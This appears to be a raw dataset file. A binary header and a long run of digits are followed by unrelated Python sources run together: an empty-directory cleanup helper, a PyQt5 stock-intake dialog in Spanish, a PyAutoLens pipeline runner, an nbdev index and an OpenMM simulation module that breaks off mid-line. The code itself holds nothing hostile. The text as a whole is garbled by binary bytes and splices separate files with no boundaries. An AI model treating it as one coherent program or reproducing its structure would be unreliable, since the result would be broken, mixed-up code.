�����    �   huggingface�{"info": {"features": {"id": {"dtype": "string", "_type": "Value"}, "text": {"dtype": "string", "_type": "Value"}, "dataset_id": {"dtype": "string", "_type": "Value"}}}}p4���� dataset_id��������text���� id����  �@   �� ����+�+�(;�;@ w@ w@�Ȇ@8J���$,3:AIQYaipw~������������������ !(07>ELSZaipv}������������������� #*19@GNU\cjqy������������������� ")07>ELRZahov}�����������������$+29@GNV]els{������������������$+29@HOV^fmt{������������������$+29@GNU\cjqx������������������$+2:AHOV^elsy������������������ $,3:@HOV\bfmt{�����������������     % , 3 : A I P W _ g o w  � � � � � � � � � � � � � � � � �      & . 4 ; B I P W _ f m t { � � � � � � � � � � � � � � � � � � �    ' . 5 < C J Q X ` g n t { � � � � � � � � � � � � � � � � � �    ' . 5 < C J R Y ` g m t { � � � � � � � � � � � � � � � � � �    ' - 5 < D K R Y a h o u | � � � � � � � � � � � � � � � � � � �   '.5<CIPW^elt{������������������ %,4;AIOV]djqx�����������������%,3:BIPW^elsz������������������ !)08@GNU\ckry������������������ &.6=DKRZahow~������������������ ")08?FMT[bipw~������������������ '.5=ELSZahov~������������������ !(/6<BJQW_fmtz������������������%,4<CJQX_fmu|������������������ #*17>DKRY`gnv}������������������ #+2:BIQX_fnu|������������������ !(/7>EMT[bipx����������������� '.5<CKRY`gnu|������������������ &-4<CJQX_fmt{�������������20918845888264109793451118788525952611714578715808795440742160797105263441145366311189085109887551035954894196105249343850336118163361141446425887141213090426936962153887023317500381215080751442571014228310522885836728592385617953573468871172706768526198655633468236565828745291368250250612736254116045855056828517195010721812622231535428395655289216892123060126383825627953238041442252618325596316550194292532857493316561004845017197534791486975322991412210081135972371896240871878879492512511772585789499033317254949503734683175981282455551995601424844574444811767405606188427413882928882403723679331801707855200318353123361243399286957336432144515978334447554867301524741988998815811489462378182340754302022638767556888630888512479256103066658910644123911103071485292147118649932307816530878121658176736077404707782335148606998755995263602333485281258220123676332700687184114922882899007120119437006795718338851112035573663778101907821214162234067991140142673304931201633125710332255451188433517285301840465485942111876691745877759055811068723132205545910721220998356909043151828084255634564782709061088268314354091230128458083189567020124984074547242789412720016092140964135610996124127450705757734718930832661429305137253412140739872169574126341923095595257002517805756313044938739742573591175611615916254583410430185424336159036705233209412567341847849055593511080141410238200216262626108334649369341079223162221999457127689811233834110356528234738777572351139151816040011042287098443351984828930119126360673865240729411989300211036314512341025450524352587161196284512278123014085330090466426674838594758841139692401232151375792534464524302790657363810940142144404724284132691671117610011169526152243126195425805742127186485833863679160760473318224543976661224958241912171107338673926931146360238706023402910919393575218203854876365562910403268115218977733252269640939140011405076147888196155884268078422627298105215744195669751619767078441661229094193320078327592361619352779601128020978161529054482603225765959251180718637100107780390195889110462806209214914883895791922204546123795875405638696099230802812355415743263981242559534513380394390171021437331981947193554231212144147460412077890411141942098111541119849494314866203665591527712719091106772811083648681737092964047104238918800144307866595356304552900110228212390415108036888996240106047395895047191143125926491861341968390212755717117387441112759710286451119944391034475879870831144799116451291022617452972313889821645911190295544196390533570246727811000747612379901553694087770776421401871418826221340132522581920122364291255642411685492221006469613799741384278825672440832463101262168639816838819765954103511063383405311792272759144113654886050433157661331331378314621070975118761122068045601749156687656323870392051273362744798729002680643804014686771241219695914454624335113323699537468384616952387638425731091544234053142753681062311046329185988575835784180874638625551251480401987089318834701666271494602139379694697548334290808940027710112238118106292951002121923668653431749790688610660667361012347742909003243116309832811480158970011430445285429462194795675582924630064108604499322342915187811647923016239464556907680910449566690098733968010815902635693986040603344276128405914459539810682425734958992811037062075094182921512976398983673831000576344127051026904252424716119260376168384223024915371048875834200321119367239162605725723385509412542570487156510710992137543608917887887294420345897457376191686476294238459397091370812937653551098606511162470478695866753385878372523204803444795139162728416022431966124998954632312941501356335248528726964498613044659599666720601397535623593899928732122237262933023151204108278942284624727472211780131886504741130931496762126649296657704609018996533666766726704860587212294487341234406564616573078617940108548631791225120950355330059423082211797577790362002481852124581498045393609131105529687978258940022151763514131564675306356064141519536763261015888268651984891216616129934911306717144551598361788615711662128462683330366785631536394573258827578460102488175665281109404961237152114531603426677182015010636529838761076588228197086126956631042212796367194609191138639864968421628861134351150664027171333117656134019158747801060088958953185203313634244797863331249568711886274510228094630665776096325222277953631246510486411984044264554115010614000627162812288038106773123643280127709921038758372502609894634412762845200057063853121987712090137500262424817382664343424450086723306199472553548224711344077886874415644168491255641046698921249296636927641265472824071511271874104596928451133565800176619859906622164215411092670109117871106042165734983692448717287071751141264902510816911333142643389310246630505132931241229371440124775941155139899656495450174111248888602458911651035622811236588012424764106807793222271477546571288832512822831446453796780179143989104095131232537555715751279181218010028726975869149596014992230681389699885188311127391032310474504376707789216634673519988819111320442716799648710023067804632574999817808361927125751092029043970459012842692495168893072333381367431850549212311030536846466072364645019712107343483825292239541151673910227023403964682757442248357313605911175972867852818327212727695335986584553549085931172061841050935962172114918017531499366187121189718971107837164470491997091191043995122118475881407843687012027786639239093233809857833331193944175635240081952365114416399944210832013437295674375411471299838604974502601276377217542631371556320279369894513006689640655710042514220855622007301113124787437257897665274512357718297413927416176331034730345586272899486286144762573146688582986102819338938974866126510643633116042442307793487130911684392333246353198757055027492072108372476002296728816232130827039662958337713073865154012881702499854681464343239130313406652796136356315918991388411163961513513558210769012581341703614713730686265751079684721177529153306915842456067178523487545411586980343410694932498948253431711448239041279549357331081050380698232971507776958009397749859632632740024726450478115849499660646339697359812634816126261148084314120648631234918418595058644992105835091265306120009263077893118717035181701115348331207715851782461284311072488867006152913210611639363590399429153661018970712671455194072973281159686299356238062051852934323156164996497471073204945621371417523217490030489734755935770345812735716754979884335998115427511977888795736483114309526611642490246448544222511232944198704392625729176667919679019946592103779422357594980764955859931107834465632028510091106300998507173520436690528912644738726274427784241010533614438591140552952539775874149105462306905562111468636186917748904611153547429764735314941974149406512310299979389214763146426384331456104970583154099188906014296499741203501212213698011423185654666286783459980982946235169021012945793999878689640810513641538893721293717316115906923171701237824765058706953922173289626896881447199908703845578331007776399090357035143964221535617336205627743730085190943183300690677586021101864558762560011039785118058266492043458535111508587503890477897193629061452056434819�;~;�JMK�\>~U�������ӻ��e��'�,X-�4U5eGI�N YKk4mNp����n�}���p�D��$`zs5*8�G�YK�g������c�������Y�]E(,+k7�7�:�>�[ \�_�a�dOp-r�xև�-�������1���D��������� �z���K�R U&Y�f�m��# $ &�&�M�R�Sр��L���������b�m�g���������p�g�Y�����z��'��f����������k�-��������� ����!�"�('3M�B�|��H �O d �p b n� A� � �� � �� {� � ��  �! �+ �5 y9 �< �I �h � �� � R� s� �� �� *� �� �� �� �� E� � � � � �% * 6 YB N 0c �v 'z �� � �� � P� Z� �� �� R� N 5; �; �> �? �H �} � ұ �� �� � � �) �- �6 �F � k� � S� �� �� \� �� � �� z� �� m1MAAOw\Qb�m�{%���ɸ������Z�l�p����L>[J�����̫<������1~3/6�Y ������������� ����:�������V ��D�I�b����[���J+�C�I�T�X_�t�u�{Z���#�����x����N�k �$�_{����ɑ��� ���V� ���$w(�/�02k3Vk q�s8��8���"�p����� ���F�^�� f+�++qXÃp���������#�"� Q^[�]?c�kLv������r�$���ķ:�e���$�� 3bv%6& .�1 38m;�<=(?�@SB�C:e�j�my{P������z� ���������h�q �k�(�?H������ �H�7������6�c�z�� ���&J'N*�*/,a/.:�?DyEnF�HL:O�U�k^t�����{��$$)�:;CA�R���5�(�Y�����c1�T�XiY�kr�s������������U���P�F��� � D��+�q�~�~J�~�[���&[�[d:e�i�kl�q�~��^��n�K���\���N�� 8� �� �� :� |� t!�_!/c!�c! v!�v!u}!^�!�!*�!"�!��!&�!k�!��!f�!��!J"/"�"Y"9"�,"�-"�/"�/"M1"�9"�<"�K"ZY"�Z"Xf"��"�|#~#̃# �##�#��#�#�#��#}�#3�#��#�$X $f$n8$�K$�W$�Y$J�$s�$~�$�$4�$1�$�%�%l%�8%�B%+F%�%�%��%��%��%o�%}�%D�%Y�%Z&�&&a&f&�;&�R&ϗ&8�&��&B�&w�&c�&��&��&N�&� '� '�'�'�"'�#'�J'�u'Ƌ';�'��'ț'5�'��'��'��'9�'�'��'5�'��'�'((� (,(g(�(�(@"(�(q�(y�(��(i�(��(�g)�)&�)S�)��)�)h�)`�)(�)��)��)�=*�@*hJ*1]*Qg*Xo*�t*�u*��*��*@�*�*��*~�*R�*�+�5+[6+�7+�N+�O+Z+r]+l+}�+�+m�+��+ �+��+�,�3,:,H>,(A,�C,�R,�[,]o,�,�,�,.�,��,�,�-��-~�-�-z�-��-��-��-�-n�-��-s�-��-1�-�.�.�.�%.(1.@3.F.�T.>\.�d.yl.@n.3p.�w.y.R}.�}.R.(�.u�.��.;�.Ԗ.�.��.�.{�.|�.D�.Y�.h�.!/�#/�-/�Y/ b/ f/�i/�k/k�/��/�/�/��/ľ/�/��/*�/#�/�/��/��/8�/��/V�/20*0?0D(0(:0�I0�Z0b0Wc0Ej02l0�l0^�0�1(1w:1Jy1{z1�|1 �1�1��1��1��1e�1m�1��2V�2��2\�20�2��2��2z 3n3�+3�23\U3tV3�[3�^3Հ3�3R�3�3w�3��3\�3n4��4$�4��4��4ߘ4��4b�4v 6d6H;6�K6FL6�N6�\6�]6��6��6Z�6;�68�6U�6P�6��6��6�7�7U7�7�+7�-7~H7�s7uv7/�7F�7��7M�7^�7E�7r�7��7��7g�7�7��7X 8�8�8+8�28�<8 V8��8I�8��8��8�8W�8[R9�X9�g9P�93�9��9��9��9��9=�9�9��9 :�:c:L:�:_F:EG:vh:qn:��:�:e�:��:�:��:,�:��:M�:��:�:);x;q;+;tw;O�;�;�;@�;ĥ;Ȧ;:�;��;[�;��;N�;��;��;��;��;?�;u<0<�<x<w<�<�<�*<�n<�<�<U�<!�<g�<�<��<��<��<�'=j0=x2=)F=iF=ZJ=�m=��=��=3�=T�=Q>3X>]>r�>O�>��>C�>�?�?U?)??b?�7?AU?�U?X?v]?�j?�k?�?q�?�?��?׸?��?��?��?)�?*@�@�$@�*@�*@//@�6@�8@�;@import os def remove_empty_directories_from_dirtree(dirpath): """Remove empty directories walking through all nested subdirectories. Args: dirpath (str): Top directory tree path. """ for root, dirs, files in os.walk(dirpath, topdown=False): if not os.listdir(root): os.rmdir(root) def remove_file_and_parent_dir_if_empty(filepath): """Remove a file and the directory that contains it if it is empty. Args: filepath (str): Path of the file to remove. Raises: FileNotFoundError: the file doesn't exists. """ os.remove(filepath) parent_dir = os.path.abspath(os.path.dirname(filepath)) if not os.listdir(parent_dir): os.rmdir(parent_dir) src/main/python/widgets/dialogs/incoming_dialog.py from PyQt5 import QtWidgets, QtGui, QtCore from widgets.line_item_close_button import LineItemCloseButton from widgets.spec_fields import AutocapField, StockNumberField from widgets.message_boxes import WarningBox from utils.styling import ( generic_title_style, generic_groupbox_normal_style, generic_messagebox_style, ) from utils import utils_collection as utils from utils import db_manager from utils import tests class IncomingDialog(QtWidgets.QDialog): def __init__(self, parent=None): super(IncomingDialog, self).__init__(parent) self.incoming_comps_and_amounts_for_operation = {} self.data_for_final_dialog = {} self.setWindowFlags( QtCore.Qt.Dialog | QtCore.Qt.CustomizeWindowHint | QtCore.Qt.WindowCloseButtonHint ) self.setFixedWidth(410) title = QtWidgets.QLabel("Ingreso de componentes") title.setAlignment(QtCore.Qt.AlignCenter) title.setStyleSheet(generic_title_style) top_section = QtWidgets.QHBoxLayout() self.packing_list_field = QtWidgets.QLineEdit() self.packing_list_field.setPlaceholderText("Remito...") self.supplier_field = QtWidgets.QLineEdit() self.supplier_field.setPlaceholderText("Proveedor...") self.note_field = QtWidgets.QLineEdit() self.note_field.setPlaceholderText("Nota...") for i in [self.packing_list_field, self.supplier_field, self.note_field]: i.setFixedWidth(125) top_section.addWidget(i) bottom_section = QtWidgets.QHBoxLayout() back_button = QtWidgets.QPushButton("« Volver") back_button.setShortcut("Alt+v") execute_button = QtWidgets.QPushButton("Ejecutar »") execute_button.setShortcut("Alt+e") execute_button.setDefault(True) bottom_section.addWidget(back_button) bottom_section.addWidget(execute_button) groupbox = QtWidgets.QGroupBox("Componentes ingresantes") groupbox.setStyleSheet(generic_groupbox_normal_style) groupbox.setMinimumWidth(333) add_component_button = QtWidgets.QPushButton("+ Agregar componente") add_component_button.setShortcut("Alt+a") self.comps_holder_section = QtWidgets.QVBoxLayout() groupbox_inner_section = QtWidgets.QVBoxLayout() groupbox_inner_section_1 = QtWidgets.QHBoxLayout() groupbox_inner_section_1.addWidget(add_component_button) groupbox_inner_section_2 = QtWidgets.QHBoxLayout() groupbox_inner_section_2.addLayout(self.comps_holder_section) groupbox_inner_section.addLayout(groupbox_inner_section_1) groupbox_inner_section.addLayout(groupbox_inner_section_2) groupbox.setLayout(groupbox_inner_section) groupbox_section = QtWidgets.QHBoxLayout() groupbox_section.addStretch() groupbox_section.addWidget(groupbox) groupbox_section.addStretch() layout = QtWidgets.QVBoxLayout() layout.setSizeConstraint(QtWidgets.QLayout.SetFixedSize) layout.addWidget(title) layout.addLayout(top_section) layout.addLayout(groupbox_section) layout.addLayout(bottom_section) self.setLayout(layout) back_button.clicked.connect(self.close) add_component_button.clicked.connect(self.add_line) execute_button.clicked.connect(self.execute_incoming_comps) def add_line(self): single_line_section = QtWidgets.QHBoxLayout() component_field = AutocapField("Componente...") component_field.setFixedWidth(200) component_field.setFocus() component_field.set_completer(source="comps in stock") value_field = StockNumberField("Cantidad...") value_field.setFixedWidth(80) close_button = LineItemCloseButton(holder=self.comps_holder_section) single_line_section.addWidget(component_field) single_line_section.addWidget(value_field) single_line_section.addWidget(close_button) self.comps_holder_section.addLayout(single_line_section) def execute_incoming_comps(self): for i in [ self.test_if_packing_list_or_supplier_fields_are_empty, self.test_if_there_are_no_components, self.test_if_there_are_duplicates, self.test_if_there_are_empty_main_fields, self.test_if_there_are_unrecognized_components, ]: if i(): return self.insert_incoming_comps_into_db() def test_if_packing_list_or_supplier_fields_are_empty(self): if self.packing_list_field.text() == "": WarningBox("Remito faltante", "Ingresar remito\nantes de ejecutar.").exec_() self.packing_list_field.setFocus() return True elif self.supplier_field.text() == "": WarningBox( "Proveedor faltante", "Ingresar proveedor\nantes de ejecutar." ).exec_() self.supplier_field.setFocus() return True else: return False def test_if_there_are_no_components(self): no_line_items = not self.comps_holder_section.children() contents = utils.get_line_items_contents(self.comps_holder_section) empty_string = tests.test_if_empty_string_in_line_items_contents(contents) if no_line_items or empty_string: WarningBox( "Sin componentes", "Completar o borrar campos\nvacíos antes de ejecutar.", ).exec_() return True else: return False def test_if_there_are_duplicates(self): contents = utils.get_line_items_contents(self.comps_holder_section) duplicates = tests.test_if_duplicated_first_value_in_line_items_contents( contents ) if duplicates: WarningBox( "Componentes duplicados", "Borrar uno de los componentes duplicados." ).exec_() return True else: return False def test_if_there_are_empty_main_fields(self): contents = utils.get_line_items_contents(self.comps_holder_section) if not all(contents): return self.autoremove_line() else: return False def test_if_there_are_unrecognized_components(self): contents = utils.get_line_items_contents(self.comps_holder_section) incoming_comps = contents[0::2] db = db_manager.DB_Manager() existing_comps = db.get_all_display_names_for_components() db.close_connection() unrecognized_comps = not set(incoming_comps).issubset(existing_comps) if unrecognized_comps: WarningBox( "Componente extraño", "Componente no reconocido. Cargar el\ncomponente desde el autocompletado.", ).exec_() return True else: return False def autoremove_line(self): for line_layout in self.comps_holder_section.layout().children(): two_empty_fields_on_same_line = ( line_layout.itemAt(0).widget().text() == "" and line_layout.itemAt(1).widget().text() == "" ) if two_empty_fields_on_same_line: if len(self.comps_holder_section.layout().children()) > 1: utils.remove_three_widget_layout(line_layout) return False else: if len(self.comps_holder_section.layout().children()) <= 1: WarningBox( "Sin componentes", "Completar o borrar campos\nvacíos antes de ejecutar.", ).exec_() return True elif not two_empty_fields_on_same_line: WarningBox( "Sin componentes", "Completar o borrar campos\nvacíos antes de ejecutar.", ).exec_() return True def insert_incoming_comps_into_db(self): fields_contents = utils.get_line_items_contents(self.comps_holder_section) incoming_components = fields_contents[0::2] incoming_amounts = fields_contents[1::2] incoming_components_and_amounts_for_display = dict( zip(incoming_components, incoming_amounts) ) db = db_manager.DB_Manager() for k, v in incoming_components_and_amounts_for_display.items(): self.incoming_comps_and_amounts_for_operation[ db.get_SQL_name_for_component(k) ] = utils.format_number_for_calculation(v) for component_display in incoming_components_and_amounts_for_display.keys(): for ( comp_sql, amount, ) in self.incoming_comps_and_amounts_for_operation.items(): stock_vald_pre_application = db.get_stock_at_valdenegro_for(comp_sql) stock_vald_post_application = stock_vald_pre_application + amount self.data_for_final_dialog[component_display] = [ stock_vald_pre_application, stock_vald_post_application, ] data = { "comp_sql": comp_sql, "amount": amount, "packing_list": self.packing_list_field.text(), "supplier": self.supplier_field.text(), "note": self.note_field.text() if self.note_field.text() else "---", "stock_vald_post_application": stock_vald_post_application, "stock_karina": db.get_stock_at_assembler_for(comp_sql, "karina"), "stock_brid": db.get_stock_at_assembler_for(comp_sql, "brid"), "stock_tercero": db.get_stock_at_assembler_for(comp_sql, "tercero"), } db.apply_incoming_to_valdenegro(data) start_screen = self.parent().parent().parent().start_screen start_screen.rebuild_main_section() settings = QtCore.QSettings("solutronic", "admin_stock") for component, amount in incoming_components_and_amounts_for_display.items(): db.log_new_movement( movement="Ingreso", destination="Depósito", component=component, amount=amount, user=settings.value("username"), ) db.close_connection() IncomingAppliedMessageBox(self).exec_() class IncomingAppliedMessageBox(QtWidgets.QMessageBox): def __init__(self, parent=None): super(IncomingAppliedMessageBox, self).__init__(parent) comps_and_amounts = ( self.sender().parent().incoming_comps_and_amounts_for_operation ) data_for_final_dialog = self.sender().parent().data_for_final_dialog self.setWindowTitle("Finalizado") self.setWindowFlags( QtCore.Qt.Dialog | QtCore.Qt.CustomizeWindowHint | QtCore.Qt.WindowTitleHint | QtCore.Qt.WindowCloseButtonHint ) title = QtWidgets.QLabel("Ingreso aplicado a Depósito") title.setAlignment(QtCore.Qt.AlignCenter) title.setStyleSheet(generic_title_style) table = QtWidgets.QTableWidget() table.setFixedWidth(400) table.setFocusPolicy(QtCore.Qt.NoFocus) table.setSelectionMode(QtWidgets.QAbstractItemView.NoSelection) table.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers) table.verticalHeader().setVisible(False) table.setSelectionMode(QtWidgets.QAbstractItemView.NoSelection) table.setColumnCount(4) table.setHorizontalHeaderLabels(["Componente", "Inicial", "Ingreso", "Final"]) table.horizontalHeaderItem(0).setTextAlignment(QtCore.Qt.AlignHCenter) table.horizontalHeaderItem(1).setTextAlignment(QtCore.Qt.AlignHCenter) table.horizontalHeaderItem(2).setTextAlignment(QtCore.Qt.AlignHCenter) table.horizontalHeaderItem(3).setTextAlignment(QtCore.Qt.AlignHCenter) table.horizontalHeader().setDefaultSectionSize(70) table.horizontalHeader().setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch) table.horizontalHeader().setSectionResizeMode(1, QtWidgets.QHeaderView.Fixed) table.horizontalHeader().setSectionResizeMode(2, QtWidgets.QHeaderView.Fixed) table.horizontalHeader().setSectionResizeMode(3, QtWidgets.QHeaderView.Fixed) table.setRowCount(len(comps_and_amounts)) incoming_comp_names = data_for_final_dialog.keys() incoming_comp_amounts = comps_and_amounts.values() stock_vald_pre_application = [v[0] for v in data_for_final_dialog.values()] stock_vald_post_application = [v[1] for v in data_for_final_dialog.values()] utils.populate_table_column_with_list_of_strings( table=table, col_num=0, input_list=incoming_comp_names ) utils.populate_table_column_with_list_of_integers( table=table, col_num=1, input_list=stock_vald_pre_application ) utils.populate_table_column_with_list_of_integers( table=table, col_num=2, input_list=incoming_comp_amounts, with_plus=True ) for i in range(table.rowCount()): table.item(i, 2).setBackground(QtGui.QColor("#79c879")) utils.populate_table_column_with_list_of_integers( table=table, col_num=3, input_list=stock_vald_post_application ) custom_height = table.rowCount() * 30 + 25 table.setMaximumHeight(custom_height) table.setFixedHeight(custom_height) ok_button = QtWidgets.QPushButton("OK") layout = QtWidgets.QVBoxLayout() layout.addWidget(title) layout.addWidget(table) layout.addWidget(ok_button) self.layout().addLayout(layout, 0, 0, 0, 0, QtCore.Qt.AlignTop) self.setStyleSheet(generic_messagebox_style) admin_window = self.parent().parent().parent().parent() admin_window.statusbar.show_quick_message("Ingreso aplicado a Depósito") ok_button.clicked.connect(self.close) ok_button.clicked.connect(self.parent().close) 1-10 __version__ = (0, 0, 3) version = '.'.join(map(str, __version__)) from .core import benchmark 0 from autofit import conf from autolens.data import ccd from autolens.data.plotters import ccd_plotters import os # Welcome to the pipeline runner. This tool allows you to load strong lens data, and pass it to pipelines for a # PyAutoLens analysis. To show you around, we'll load up some example data and run it through some of the example # pipelines that come distributed with PyAutoLens. # The runner is supplied as both this Python script and a Juypter notebook. Its up to you which you use - I personally # prefer the python script as provided you keep it relatively small, its quick and easy to comment out different lens # names and pipelines to perform different analyses. However, notebooks are a tidier way to manage visualization - so # feel free to use notebooks. Or, use both for a bit, and decide your favourite! # The pipeline runner is fairly self explanatory. Make sure to checkout the pipelines in the # workspace/pipelines/examples/ folder - they come with detailed descriptions of what they do. I hope that you'll # expand on them for your own personal scientific needs # Get the relative path to the config files and output folder in our workspace. path = '{}/../'.format(os.path.dirname(os.path.realpath(__file__))) # Use this path to explicitly set the config path and output path. conf.instance = conf.Config(config_path=path+'config', output_path=path+'output') # It is convenient to specify the lens name as a string, so that if the pipeline is applied to multiple images we # don't have to change all of the path entries in the load_ccd_data_from_fits function below. lens_name = 'lens_light_and_x1_source' # An example simulated image with lens light emission and a source galaxy. pixel_scale = 0.1 # lens_name = 'slacs1430+4105' # Example HST imaging of the SLACS strong lens slacs1430+4150. # pixel_scale = 0.03 ccd_data = ccd.load_ccd_data_from_fits(image_path=path + '/data/example/' + lens_name + '/image.fits', psf_path=path+'/data/example/'+lens_name+'/psf.fits', noise_map_path=path+'/data/example/'+lens_name+'/noise_map.fits', pixel_scale=pixel_scale) ccd_plotters.plot_ccd_subplot(ccd_data=ccd_data) # Running a pipeline is easy, we simply import it from the pipelines folder and pass the lens data to its run function. # Below, we'll' use a 3 phase example pipeline to fit the data with a parametric lens light, mass and source light # profile. Checkout _workspace/pipelines/examples/lens_light_and_x1_source_parametric.py_' for a full description of # the pipeline. # from pipelines.examples import lens_light_and_x1_source_parametric # # pipeline = lens_light_and_x1_source_parametric.make_pipeline(pipeline_path='example/' + lens_name + '/') # # pipeline.run(data=ccd_data) # Another pipeline in the examples folder uses 5 phases to ultimately reconstruct the source galaxy on an adaptive # pixel-grid. To run this pipeline on our data, simply comment out / delete the lines above (lines 47-51) which run # the parametric souorce pipeline, and uncomment the lines below. from workspace.pipelines.examples import lens_light_and_source_inversion pipeline = lens_light_and_source_inversion.make_pipeline(pipeline_path='example/' + lens_name + '/') pipeline.run(data=ccd_data) # And there we have it, the pipeline runner. For me personally, I find it easiest too manage my lens models by having # multiple pipeline runners as Python, with each dedicated to a specific set of pipelines and lenses. This makes it # easier to set off multiple pipelines at the same time, whilst keeping a good sense of what their purpose is. # You experiment with different runners to figure out the workflow that works best for you - you may well prefer using # a Juypter notebook to run pipelines, so make sure to checkout the notebook pipeline runner also in this folder.unknowncoder05/HRMhrm_api/applied/views/__init__.py0 from .project import * # AUTOGENERATED BY NBDEV! DO NOT EDIT! __all__ = ["index", "modules", "custom_doc_links", "git_url"] index = {"get_rand_imgs": "00_prep.ipynb", "vid_from_frames": "00_prep.ipynb", "Video": "00_prep.ipynb", "VideoDataset": "00_prep.ipynb", "get_rico_imgs": "00_prep.ipynb", "read_video_data": "00_prep.ipynb", "get_non_duplicate_corpus": "00_prep.ipynb", "generate_setting2": "00_prep.ipynb", "get_all_texts": "00_prep.ipynb", "Extractor": "01_features.ipynb", "SIFTExtractor": "01_features.ipynb", "CNNExtractor": "01_features.ipynb", "imagenet_normalize_transform": "03_model.ipynb", "get_transforms": "01_features.ipynb", "SimCLRExtractor": "01_features.ipynb", "gen_vcodebook": "01_features.ipynb", "gen_codebooks": "01_features.ipynb", "get_df": "01_features.ipynb", "get_bovw": "01_features.ipynb", "extract_features": "01_features.ipynb", "new_get_bovw": "01_features.ipynb", "calc_tf_idf": "02_eval.ipynb", "cosine_similarity": "02_eval.ipynb", "hit_rate_at_k": "02_eval.ipynb", "mean_reciprocal_rank": "02_eval.ipynb", "r_precision": "02_eval.ipynb", "precision_at_k": "02_eval.ipynb", "average_precision": "02_eval.ipynb", "mean_average_precision": "02_eval.ipynb", "recall_at_k": "02_eval.ipynb", "rank_stats": "02_eval.ipynb", "evaluate": "02_eval.ipynb", "get_eval_results": "02_eval.ipynb", "evaluate_ranking": "02_eval.ipynb", "sift_frame_sim": "03_model.ipynb", "simclr_frame_sim": "03_model.ipynb", "SimCLRDataset": "03_model.ipynb", "get_train_transforms": "03_model.ipynb", "get_val_transforms": "03_model.ipynb", "NTXEntCriterion": "03_model.ipynb", "SimCLRModel": "03_model.ipynb", "flatten_dict": "04_approach.ipynb", "gen_extracted_features": "04_approach.ipynb", "gen_tfidfs": "04_approach.ipynb", "gen_bovw_similarity": "04_approach.ipynb", "fuzzy_LCS": "04_approach.ipynb", "gen_lcs_similarity": "04_approach.ipynb", "fix_sims": "04_approach.ipynb", "sort_rankings": "04_approach.ipynb", "approach": "04_approach.ipynb", "compute_sims": "04_approach.ipynb", "logger": "05_cli.ipynb", "URLs": "05_cli.ipynb", "download": "05_cli.ipynb", "VWORDS": "05_cli.ipynb", "N_IMGS": "05_cli.ipynb", "N_FRAMES_TO_KEEP": "05_cli.ipynb", "FPS": "05_cli.ipynb", "BEST_DL_MODELS": "05_cli.ipynb", "BEST_IR_MODELS": "05_cli.ipynb", "BEST_MODEL_CONFIGS": "05_cli.ipynb", "reproduce": "05_cli.ipynb", "tango": "05_cli.ipynb", "write_json_line_by_line": "07_utils.ipynb", "read_csv_to_dic_list": "07_utils.ipynb", "read_json": "07_utils.ipynb", "read_json_line_by_line": "07_utils.ipynb", "find_file": "07_utils.ipynb", "write_csv_from_json_list": "07_utils.ipynb", "group_dict": "07_utils.ipynb", "load_settings": "07_utils.ipynb", "get_grayscale": "07_utils.ipynb", "remove_noise": "07_utils.ipynb", "thresholding": "07_utils.ipynb", "thresholding_med": "07_utils.ipynb", "dilate": "07_utils.ipynb", "erode": "07_utils.ipynb", "opening": "07_utils.ipynb", "canny": "07_utils.ipynb", "deskew": "07_utils.ipynb", "match_template": "07_utils.ipynb", "extract_text": "07_utils.ipynb", "preprocess_img": "07_utils.ipynb", "extract_frames": "07_utils.ipynb", "process_frame": "07_utils.ipynb", "execute_retrieval_run": "08_combo.ipynb", "run_settings": "08_combo.ipynb", "write_results": "08_combo.ipynb", "write_rankings": "08_combo.ipynb", "convert_results_format": "08_combo.ipynb", "get_info_to_ranking_results": "08_combo.ipynb", "tango_combined": "08_combo.ipynb"} modules = ["prep.py", "features.py", "eval.py", "model.py", "approach.py", "cli.py", "utils.py", "combo.py"] doc_url = "https://ncoop57.github.io/tango/" git_url = "https://github.com/ncoop57/tango/tree/main/" def custom_doc_links(name): return None """ mmvt_sim_openmm.py Create the Sim_openmm object which contains the objects needed for an openmm simulation based on the settings provided by a user. These objects are specific to MMVT only. """ try: import openmm.app as openmm_app except ImportError: import simtk.openmm.app as openmm_app from parmed import unit import seekr2plugin import seekr2.modules.common_sim_openmm as common_sim_openmm class MMVT_sim_openmm(common_sim_openmm.Common_sim_openmm): """ system : The OpenMM system object for this simulation. integrator : the OpenMM integrator object for this simulation. simulation : the OpenMM simulation object. traj_reporter : openmm.DCDReporter The OpenMM Reporter object to which the trajectory will be written. energy_reporter : openmm.StateDataReporter The OpenMM StateDataReporter to which the energies and other state data will be reported. """ def __init__(self): super(MMVT_sim_openmm, self).__init__() self.system = None self.integrator = None self.simulation = None self.traj_reporter = openmm_app.DCDReporter self.energy_reporter = openmm_app.StateDataReporter return def add_integrator(sim_openmm, model, state_prefix=None): """ Assign the proper integrator to this OpenMM simulation. """ if model.openmm_settings.langevin_integrator is not None: target_temperature = \ model.openmm_settings.langevin_integrator.target_temperature friction_coefficient = \ model.openmm_settings.langevin_integrator.friction_coefficient random_seed = \ model.openmm_settings.langevin_integrator.random_seed timestep = \ model.openmm_settings.langevin_integrator.timestep rigid_constraint_tolerance = \ model.openmm_settings.langevin_integrator\ .rigid_tolerance sim_openmm.timestep = timestep sim_openmm.integrator = seekr2plugin.MmvtLangevinIntegrator( target_temperature*unit.kelvin, friction_coefficient/unit.picoseconds, timestep*unit.picoseconds, sim_openmm.output_filename) if random_seed is not None: sim_openmm.integrator.setRandomNumberSeed(random_seed) if rigid_constraint_tolerance is not None: sim_openmm.integrator.setConstraintTolerance( rigid_constraint_tolerance) if state_prefix is not None: sim_openmm.integrator.setSaveStateFileName(state_prefix) else: raise Exception("Settings not provided for available "\ "integrator type(s).") return def add_forces(sim_openmm, model, anchor): """ Add the proper forces for this MMVT simulation. """ for milestone in anchor.milestones: cv = milestone.get_CV(model) myforce = make_mmvt_boundary_definitions( cv, milestone) sim_openmm.integrator.addMilestoneGroup(milestone.alias_index) forcenum = sim_openmm.system.addForce(myforce) return def add_simulation(sim_openmm, model, topology, positions, box_vectors, frame=0): """ Assign the OpenMM simulation object for MMVT. """ sim_openmm.simulation = openmm_app.Simulation( topology.topology, sim_openmm.system, sim_openmm.integrator, sim_openmm.platform, sim_openmm.properties) if positions is not None: assert frame >= 0, "Cannot have negative frame index" assert frame < positions.getNumFrames(), \ "Frame index {} out of range.".format(frame) sim_openmm.simulation.context.setPositions( positions.getPositions(frame=frame)) sim_openmm.simulation.context.setVelocitiesToTemperature( model.openmm_settings.initial_temperature * unit.kelvin) if box_vectors is not None: sim_openmm.simulation.context.setPeriodicBoxVectors( *box_vectors.to_quantity()) if model.openmm_settings.run_minimization: assert positions is not None, "If states are being loaded as starting"\ "positions, minimizations cannot be activated." print("Warning: running minimizations. It is 